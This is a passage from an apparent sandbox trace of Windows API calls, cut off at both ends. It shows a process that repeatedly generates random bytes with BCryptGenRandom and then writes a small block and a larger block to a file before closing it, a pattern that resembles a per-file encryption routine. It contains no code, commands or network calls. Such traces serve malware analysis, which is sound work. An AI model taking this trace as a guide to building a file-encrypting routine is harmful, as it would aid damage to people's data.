(_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.410] free (_Block=0x3e305b8) [0161.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.411] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.411] free (_Block=0x1fa91d0) [0161.411] free (_Block=0x1fa2ed8) [0161.411] free (_Block=0x1fa90b8) [0161.411] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.413] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x98d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.414] CloseHandle (hObject=0x2a4) returned 1 [0161.414] free (_Block=0x3df0008) [0161.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.424] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.424] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.424] free (_Block=0x3e305b8) [0161.424] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.424] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.425] free (_Block=0x1fa91d0) [0161.425] free (_Block=0x1fa2ed8) [0161.425] free (_Block=0x1fa90b8) [0161.425] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.427] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb9c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.428] CloseHandle (hObject=0x2a4) returned 1 [0161.428] free (_Block=0x3df0008) [0161.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.437] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.437] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.438] free (_Block=0x3e305b8) [0161.438] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.438] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.438] free (_Block=0x1fa91d0) [0161.438] free (_Block=0x1fa2ed8) [0161.438] free (_Block=0x1fa90b8) [0161.438] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.441] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x98f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.442] CloseHandle (hObject=0x2a4) returned 1 [0161.442] free (_Block=0x3df0008) [0161.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.452] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.452] free (_Block=0x3e305b8) [0161.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.453] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.453] free (_Block=0x1fa91d0) [0161.453] free (_Block=0x1fa2ed8) [0161.453] free (_Block=0x1fa90b8) [0161.453] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.455] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.456] CloseHandle (hObject=0x2a4) returned 1 [0161.457] free (_Block=0x3df0008) [0161.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.472] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.472] free (_Block=0x3e305b8) [0161.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.472] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.472] free (_Block=0x1fa91d0) [0161.472] free (_Block=0x1fa2ed8) [0161.472] free (_Block=0x1fa90b8) [0161.472] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.474] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.475] CloseHandle (hObject=0x2a4) returned 1 [0161.475] free (_Block=0x3df0008) [0161.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.485] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.485] free (_Block=0x3e305b8) [0161.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.486] free (_Block=0x1fa91d0) [0161.486] free (_Block=0x1fa2ed8) [0161.486] free (_Block=0x1fa90b8) [0161.486] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.490] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x31890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.492] CloseHandle (hObject=0x2a4) returned 1 [0161.493] free (_Block=0x3df0008) [0161.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.503] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.503] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.503] free (_Block=0x3e305b8) [0161.503] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.503] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.504] free (_Block=0x1fa91d0) [0161.504] free (_Block=0x1fa2ed8) [0161.504] free (_Block=0x1fa90b8) [0161.504] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.506] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15d50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.508] CloseHandle (hObject=0x2a4) returned 1 [0161.508] free (_Block=0x3df0008) [0161.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.520] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.520] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.520] free (_Block=0x3e305b8) [0161.521] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.521] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.521] free (_Block=0x1fa91d0) [0161.521] free (_Block=0x1fa2ed8) [0161.521] free (_Block=0x1fa90b8) [0161.521] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.524] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1e840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.526] CloseHandle (hObject=0x2a4) returned 1 [0161.526] free (_Block=0x3df0008) [0161.526] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.536] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.536] free (_Block=0x3e305b8) [0161.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.536] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.537] free (_Block=0x1fa91d0) [0161.537] free (_Block=0x1fa2ed8) [0161.537] free (_Block=0x1fa90b8) [0161.537] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.539] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x19a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.541] CloseHandle (hObject=0x2a4) returned 1 [0161.541] free (_Block=0x3df0008) [0161.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.552] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.552] free (_Block=0x3e305b8) [0161.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.552] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.553] free (_Block=0x1fa91d0) [0161.553] free (_Block=0x1fa2ed8) [0161.553] free (_Block=0x1fa90b8) [0161.553] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.555] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.557] CloseHandle (hObject=0x2a4) returned 1 [0161.557] free (_Block=0x3df0008) [0161.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.580] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.580] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.581] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.581] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.581] free (_Block=0x3e305b8) [0161.581] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.581] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.582] free (_Block=0x1fa91d0) [0161.582] free (_Block=0x1fa2ed8) [0161.582] free (_Block=0x1fa90b8) [0161.582] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.583] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, 